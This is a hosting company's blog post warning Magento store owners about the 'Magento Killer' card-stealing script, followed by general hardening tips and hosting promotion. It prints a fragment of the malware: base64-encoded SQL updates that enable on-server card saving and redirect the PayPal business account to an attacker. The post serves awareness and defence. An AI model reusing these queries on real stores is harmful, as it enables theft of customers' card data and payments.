Magento killer is the latest security threat which has targeted the loopholes and steals the payment details. It is a script that modifies data in the core_config_data table of the targeted Magento database.
The reason for writing this article to raise awareness and provide our readers with some tips that could help you protect your Magento store from this unwanted security threats.
What is Magento Killer?
The code uses the special queries encoded in base64 which modifies the core_config_data table of the target database.
It uses two objects namely Update DB (Savecc): This object configures the Magento website to save the client’s card information on the server, rather than sending it to the typical destination such as payment processor offered by Magento (PayPal, authorize.net). The second object is Update PP (MailPP): This object helps to change the merchant business account and execute it as per the wishes of the hacker.
$ConfKiller = array( 'Update DB (Savecc)' => base64_decode('VVBEQVRFIGBjb3JlX2NvbmZpZ19kYXRhYCBTRVQNCmBzY29wZWAgPSAnZGVmYXVsdCcsDQpgc2NvcGVf aWRgID0gJzAnLA0KYHBhdGhgID0gJ3BheW1lbnQvY2NzYXZlL2FjdGl2ZScsDQpgdmF sdWVgID0gJzEnDQpXSEVSRSBgcGF0aGAgPSAncGF5bWVudC9jY3NhdmUvYWN0aXZlJzs='), //UPDATE `core_config_data` SET `scope` = 'default', `scope_id` = '0', `path` = 'payment/ccsave/active', `value` = '1' WHERE `path` = 'payment/ccsave/active'; 'Update PP (MailPP)' => base64_decode('VVBEQVRFIGBjb3JlX2NvbmZpZ19kYXRhYCBTRVQKYHNjb3BlYCA9ICdkZWZhdWx0JywKYHNjb3BlX2lkYC A9ICcwJywKYHBhdGhgID0gJ3BheXBhbC9nZW5lcmFsL2J1c2luZXNzX2FjY291bnQnLApgdmFsdWVgID0gJ1tyZWRhY3RlZF1 AZ21haWwuY29tJwpXSEVSRSBgcGF0aGAgPSAncGF5cGFsL2dlbmVyYWwvYnVzaW5lc3NfYWNjb3VudCc7') //UPDATE `core_config_data` SET `scope` = 'default', `scope_id` = '0', `path` = 'paypal/general/business_account', `value` = '[redacted]@gmail.com' WHERE `path` = 'paypal/general/business_account';
The above mentioned is the PHP script which enables the attackers to decrypt the credit card information and steal all the money.
How to Strengthen Magento Store Security
Scan Your Magento Store
Magento offers a free Security Tool which helps to scan and monitor the security of the website. This tool lets you know about some major vulnerabilities after analyzing your website and recommends some practices to perform.
Keep Your Store Updated
Magento releases version updates and security patches regularly. The purpose of these updates is to fix the security issues and remove the bugs of the previous versions. So, don’t forget to check out the Magento updates and do subscribe to the newsletter.
a) If you are a Cloudways customer, you can upgrade your Magento 2 store using Cloudways staging environment feature to avoid any hassles on the production environment.
Implement Best Industry Practices
There is proper Magento documentation available which you should consider while developing your Magento 2 store. That’s the biggest advantage of using a powerful Content Management System for Ecommerce like Magento.
Server Security Is Essential
The server security is really important as an entire website data is stored in it. I will recommend that you must use the SSL certificate, dedicated firewall, IP whitelisting and other server security best practices.
No More Security Worries
Get 1-click SSL certificate, IP Whitelisting, Dedicated Firewall and a lot more under one solution.
Magento is a very popular Ecommerce platform used by thousands of store owners around the world. That’s why hackers are always trying to find a security breach which can help them exploiting your Magento store in no time. Unfortunately, they had come up with a security threat which steals the customer’s credit card(s) information and makes your Magento store a nightmare.
It’s not easy to stop them from doing these unethical activities. But in the end, it’s our responsibility to apply all those best security practices to ensure 100% store protection.
They are everywhere, so be secure!
Boost Your Magento Store Performance by 5x Times & Maximize Your Sales
Our fastest Magento hosting can help you in growing your business revenue by 500%
Abdur Rahman is the Magento whizz at Cloudways. He is growth ambitious, and aims to learn & share information about Ecommerce & Magento Development through practice and experimentation. He loves to travel and explore new ideas whenever he finds time. Get in touch with him at firstname.lastname@example.org